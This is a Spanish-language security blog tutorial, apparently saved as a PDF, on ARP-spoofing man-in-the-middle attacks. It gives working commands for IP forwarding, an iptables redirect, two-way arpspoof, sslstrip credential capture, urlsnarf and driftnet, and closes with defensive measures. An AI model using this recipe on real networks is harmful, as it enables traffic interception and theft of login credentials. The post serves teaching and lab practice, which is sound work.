Ataque MITM por ARP Spoofing + Sniffing

21/03/2015

HIGHSEC

BLOG

CTF

EVENTOS

VARIOS

posted on: 08-25-2014 with: 2 COMMENTS

Hola a todos, antes de comenzar me gustara agradecer a Highsec la oportunidad que me dan de participar en su pgina para compartir conocimiento
entre todos los que estamos interesados en esta rama de la informtica. Este es mi primer post, y espero que lo disfruteis.
En este post de hoy os voy a mostrar los fundamentos de arp spoofing, ataque Man in the Midle por arp spoofing y sniffing de trafico con driftnet,
urlsnarf y sslstrip.
Arp Spoofing:
Antes de explicar como realizar arp spoofing, Qu es arp?
Arp es el protocolo de resolucin de direcciones (Address Resolution Protocol) mediante el cual en una red interna se obtiene una direccin fsica a
partir de una direccin IP. La importancia de este protocolo es que la gran mayora de redes domsticas y corporativas utilizan asignacin dinmica de
Ips, por lo que la direccin IP de un equipo puede variar, esto hace que la direccin IP no sirva como identificador inequvoco del equipo. Sin embargo,
la direccin de la tarjeta de red si que es nica. Y es lo que se utiliza para mandar un paquete a un equipo.
Arp proporciona el servicio de otorgar una direccin fsica a partir de una direccin IP.
El envo de paquetes de el equipo A(IP=192.168.1.AA, MAC=AA:AA:AA:AA:AA:AA) al equipo B(192.168.1.BB,MAC=BB:BB:BB:BB:BB:BB) funcionara de
la siguiente forma.
1) A pregunta: Qu direccin fsica tiene la direccin IP 192.168.1.BB?
2) B responde: A la direccin IP 192.168.1.BB le corresponde la direccin MAC BB:BB:BB:BB:BB:BB
3) A registra en su tabla ARP, todo paquete que se tenga que enviar a la direccin IP 192.168.1.BB, envese a la direccin MAC BB:BB:BB:BB:BB:BB

En una conexin legtima, cabe esperar que la respuesta recibida despus de lanzar la consulta ARP 1) sea la correcta, pero si alguien generase una
respuesta ilegtima correctamente generada, se podra interceptar la comunicacin saliente del equipo A al equipo B.

MITM:
Esta tcnica de arp spoofing, si se hace de manera bidireccional obtenemos el resultado de un ataque man in the middle. El trfico de AB pasara
por el equipo H(Hacker) de la misma forma que lo hara el trfico BA

http://highsec.es/2014/08/ataque-mitm-por-arp-spoofing-sniffing/

1/5

Ataque MITM por ARP Spoofing + Sniffing

21/03/2015

Sniffing:
Una vez sabemos que todo el trfico de A y B pasa por H, interesara esnifar este trfico entre las vctimas para explotarlo. Para este propsito se
pueden utilizar sniffers de propsito general como Wireshark, o sniffers especficos, como:
Sslstrip: Redirige el trfico https a trfico http para sacar cuentas y contraseas en texto plano
Driftnet: Sniffing de imgenes
Urlsnarf: Sniffing de URLs
Manos a la obra:
Para esta demostracin, voy a utilizar una mquina atacante Debian Wheezy, y una mquina vctima virtualizada Kali Linux.
Antes de comenzar queremos preparar nuestro equipo para el ataque man in the middle, y una de las cosas que necesitamos es la redireccin de
trfico. Por lo que tenemos que comprobar el contenido del fichero binario que se encuentra en /proc/sys/net/ipv4/ip_forward
http://highsec.es/2014/08/ataque-mitm-por-arp-spoofing-sniffing/

2/5

Ataque MITM por ARP Spoofing + Sniffing

21/03/2015

$ cat /proc/sys/net/ipv4/ip_forward
0 es el contenido por default.
Para habilitar el trfico solo tenemos que volcar un 1 en dicho fichero.
$ echo 1 > /proc/sys/net/ipv4/ip_forward
Una vez hecho esto queremos redirigir todo el trfico http al puerto 8080 para poder realizar correctamente el sniffing. Esto lo haremos con el comando
iptables
$ iptables -t nat -A PREROUTING -p tcp destination-port 80 -j REDIRECT to-port 8080

Una vez hecho esto nuestro equipo esta preparado para el ataque. Ahora necesitamos abrir 2 terminales para realizar el arp spoofing en las 2
direcciones.
Para ello utilizaremos los siguientes comandos
$ arpspoof -i #interfaz# -t #IP equipo A# #IP equipo B#
$ arpspoof -i #interfaz# -t #IP equipo B# #IP equipo A#
Aqui vemos la salida del ltimo de estos dos.
Donde el equipo A ser la direccin IP de nuestra vctima, y B ser otro equipo, en este caso la direccin IP del router.
Veamos las tablas arp de nuestra vctima antes del envenenamiento

Y despus del envenenamiento

Como vemos, todo el trfico saliente de nuestra vctima pasa por nosotros, y de la misma forma el trfico del router a la vctima tambin.
Ahora nuestro equipo est en la posicin de MITM entre nuestra vctima y el router, llega el momento de colocar los sniffers
Para comenzar utilizaremos sslstrip, que esnife el puerto 8080, reinicie las conexiones de nuestra vctima a sus pginas actuales y escriba la salida del
resultado en un fichero determinado
$ sslstrip -k -l 8080 -w fichero
Despus el sniffer de las urls, urlsnarf, al cual especificaremos la interfaz la cual esnifar, y puesto que no tiene opcin de sacar el resultado a un
fichero utilizaremos el comando tee
$ urlsnarf -i interfaz | tee fichero
Y por ltimo el sniffer de imgenes driftnet que las almacenar en una carpeta
$ driftnet -a -d directorio -p -i wlan0
Despus de un rato podremos ver como los ficheros se van llenando de informacin, aqu vemos un ejemplo de salida de uno de los ficheros
obtenidos, el fichero obtenido por sslstrip, el cual me parece el resultado ms interesante de los 3. En el que podemos apreciar cuentas de paginas
como facebook, dropbox, y bank of america.

Tcticas de defensa:
Una tctica de defensa posible contra este ataque es la de utilizar tablas arp estticas, sin cach arp, no hay nada que envenenar por lo que este
ataque sera inviable, el problema es la carga de trabajo de esta solucin sobre todo para redes corporativas medianamente grandes, ya que cada vez
que se cambie la direccin ip de un equipo, o se aadan ms equipos, hay que actualizar las tablas de todos los equipos de la red.
Otra solucin es comprobar peridicamente el estado de las tablas arp, hay una herramienta UNIX que nos ayuda a automatizar esta tarea, esta
herramienta es Arpwatch, la cual nos manda un correo electrnico cada vez que haya un cambio en la tabla arp.
Y como tercera solucin al arp spoofing. es el utilizar RARP en vez de ARP, esto es Reverse Address Resolution Protocol, en el que a partir de una
direccin MAC nos devuelve una direccin IP, si nos devuelve ms de una direccin IP esque esta MAC ha sido clonada.
Por ltimo, como costumbre es conveniente navegar en trfico https en vez de http, ya que el trfico https est cifrado.

http://highsec.es/2014/08/ataque-mitm-por-arp-spoofing-sniffing/

3/5

Ataque MITM por ARP Spoofing + Sniffing

21/03/2015

Espero que os haya gustado.

Un saludo, Gonzalo.
Email: gonzalo.abad.perez@gmail.com
Twitter: @gonabad94
categories: VARIOS
tags: ARP, MITM

ABOUT AUTHOR

Gonzalo Abad Perez

Estudiante de Doble Grado en Ingeniera Informtica y Matemticas por la UAM. Apasionado de la seguridad informtica y la criptografa
twitter: @gonabad94 mail: gonzalo.abad.perez@gmail.com
view all posts by gonzalo abad perez

2 COMMENTS

0 TRACKBACK

Saira Isaac Hernandez

08-25-2014

Muy buen post felicidades y espero seguir leyendo mas .

RESPONDER

Zack

09-01-2014

Hola:
Muy buenos e instructivos los posts que subs. Espero que mantengis este nivel porque se aprende y se refrescan muchos
conocimientos. Solo os aconsejara una cosa, y es que si no os cuesta mucho trabajo, las imgenes de los enlaces las pongis en un
tamao mayor en la imagen que se despliega cuando se hace click en dichos enlaces, ya que algunas se ven en un tamao muy
reducido.
Saludos.
RESPONDER

NAME *
EMAIL *
WEBSITE

Cdigo CAPTCHA *

http://highsec.es/2014/08/ataque-mitm-por-arp-spoofing-sniffing/

4/5

Ataque MITM por ARP Spoofing + Sniffing

21/03/2015

SUBMIT

Copyright 2013 HighSec.es

http://highsec.es/2014/08/ataque-mitm-por-arp-spoofing-sniffing/

5/5